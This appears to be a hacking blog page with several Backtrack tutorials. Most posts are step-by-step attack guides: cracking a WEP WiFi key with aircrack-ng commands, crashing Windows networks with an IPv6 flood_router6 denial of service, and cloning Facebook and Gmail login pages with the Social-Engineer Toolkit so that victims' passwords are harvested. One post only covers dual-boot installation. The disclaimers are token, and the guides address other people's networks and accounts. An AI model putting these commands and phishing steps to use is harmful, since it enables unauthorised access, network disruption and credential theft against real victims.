Showing posts with label Backtrack Tutorial. Show all posts
Showing posts with label Backtrack Tutorial. Show all posts

Saturday, 8 March 2014

How to Hack WiFi Password





First of all you need to scan for available wireless networks.

you can use“NetStumbler” or “Kismet” for Windows and Linux and KisMac for Mac.

It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are:

1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)

WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

How to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.....

BackTrack have lots of preinstalled softwares but for this time
The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.
2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs


In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address,and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Saturday, 14 December 2013

Crash PC Network Tutorial

EDUCATIONAL PURPOSES ONLY

I would like to release this simple tutorial onto how to crash a PC based network. This exploit will work on 90% of networks. If the network of Windows computers connected are vulnerable they will consume 100% CPU usage and then become unresponsive. Now how to check if a network is vulnerable.

Press Windows Key + R on your keyboard and type "cmd" then press enter. Once inside command prompt type the following command.
Code:
ipconfig
Then look at your results. If your results including something along the lines of "IPv6 Address" the network is vulnerable. 90% of network are currently vulnerable to this.

How to take out the network
1> Boot into Backtrack 5 R3 and connect to the network
2> Run this command
Code:
iwconfig
look at which adapter comes up with connections. It will most likely be eth0 or wlan0.
3> Prepare for attack. Type the following command and leave it running for however long you want the computers to remain unusable. Please do not use this for malicious purposes, this tutorial is to learn how to better protect yourself. The command to initiate the attack is
Code:
flood_router6 <network adapter you found earlier>
My code to launch an attack was
Code:
flood_router6 eth0

All Windows machines above XP including Vista, 7, 8 and SERVER can be attacked with this!

How to protect yourself!
A quick fix to protect yourself, disable IPv6 on your computer! Do this until a stable protocol has been established!
Tricks & Tips
Thanks for reading, good luck to all in protecting yourself.

Tuesday, 29 October 2013

Install Backtrack 5 and dual boot it with windows

backtrack 5 is relatively easy to install to your hard drive and make bootable. I remember before Backtrack there was a linux distribution called P.H.L.A.K. Acronym for "Professional Hackers Linux Assault Kit". anyway, it was nearly impossible during the first few releases to install to the hard disk. you had to manually partition the drive yourself, configure the boot loader yourself and then hope that you don't lose any data creating the swap and Ext partitions. Backtrack 5 does it all automatically. I have a few pictures (taken with a smartphone) to help guide the way for you. I highly advise installing backtrack 5 to the hard drive. the CD loader takes way to long to get anything done and you really don't need to use a whole lot of hard drive space. 
First thing you need is a computer running backtrack 5 on a live DVD
 Then all you have to do is click the Install Backtrack icon


 Starting here:
go through each step
Step 1, 2 and 3 are Language, Time zone and keyboard layout.
After that, it can be a bit tricky re-sizing and partitioning the drive


What you want to do here is click "Install them side by side, choosing between them each startup"
what this will do is keep your windows or other OS partitions but resize them, making available disc space to install backtrack 5 on. at the bottom of the screen there is a slider - on the right side slide the slider to desired size of your backtrack partition. i chose 40.1gb. That's plenty for me. unless you're going to be keeping a lot of files and saving music and images, you really shouldn't need more than 30gb's.

click forward, then continue. the setup will then install backtrack after partitioning the drive
Keep in mind, the new boot loader will have BT5 as first  option by default. just hit the down arrow to select your other os.
 


Friday, 3 May 2013

Hack Any Account Using Backtrack 5

http://checkingtricks.blogspot.com/
Hi friends Now i will tell you how to hack any account using backtrack 5

first you need to install back track .

Step 1 : Open Command terminal and type

cd /pentest/exploits/set



Step 2 : type ./set see in picture below

http://checkingtricks.blogspot.com/


Step 3 : Select 2. WebSite Attack Vectors

[Image: 24.PNG]
http://checkingtricks.blogspot.com/

Step 4 : After done step 4 Now Select "Tabnabbing Attack Method"

[Image: 25.PNG]
http://checkingtricks.blogspot.com/

Step 5 : After done step 4 Now Select "Tabnabbing Attack Method"

[Image: 25.PNG]
http://checkingtricks.blogspot.com/

Step 6 : Now Select "Site Cloner"

[Image: 26.PNG]
http://checkingtricks.blogspot.com/

Step 7 : Too important step here When you have done Step 6 then it say "Enter The URL to Clone:" which means here Enter the page address of login page which Phishing Page you want like i want make FaceBook phishing page so i have going to enter : http://www.facebook.com/

If you want make Gmail Phishing page so enter http://www.gmail.com/ and as same as for Twitter,Yahoo and any one you want make. See below pic.....

[Image: 27.PNG]
http://checkingtricks.blogspot.com/

Step 8: When you have done step 7 then it called to press Return so write Return like me and press ENTER KEY same as below pic...

[Image: 28.PNG]
http://checkingtricks.blogspot.com/

9.Now my IP 1.22.120.115 works as Phishing Page link so send your IP to your Victim by Chat or Email and by any path 

To find your ip type in terminal ifconfig

[Image: 21.PNG]
http://checkingtricks.blogspot.com/

 When your Victim open your send Link then a Phishing Page come in his browser 

 Now When your victim Enter His ID and Password for open his account then page Refresh and change into Real URL page and ID Password come into your Terminal Screen see below pic....

[Image: 31.PNG]
http://checkingtricks.blogspot.com/

hope you like.

Sunday, 11 November 2012

How to Hacking Gmail and Facebook with Backtrack 5


An approach to introduce people with the truth of HACKING”.  This article is only for educational purpose don’t misuse this information.
Requirement 
Attracker :: Backtrack 5 or later
Open Backtrack Type ifconfig to check IP
Now Again Open Your Backtrack terminal and Type  c d  /pentest/exploits/set   (c d without space)
Now Open Social Engineering Toolkit (SET) ./set
Choose option 2, “Website Attack Vectors
Choose option 4, “Tabnabbing Attack Method”.
Choose option 2, “Site Cloner”
Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter.
Now send your IP to victim and when victim open IP is browser a fake Gmail page start working and when user input Username and Password in fake page. The Username and Password displayed on SET.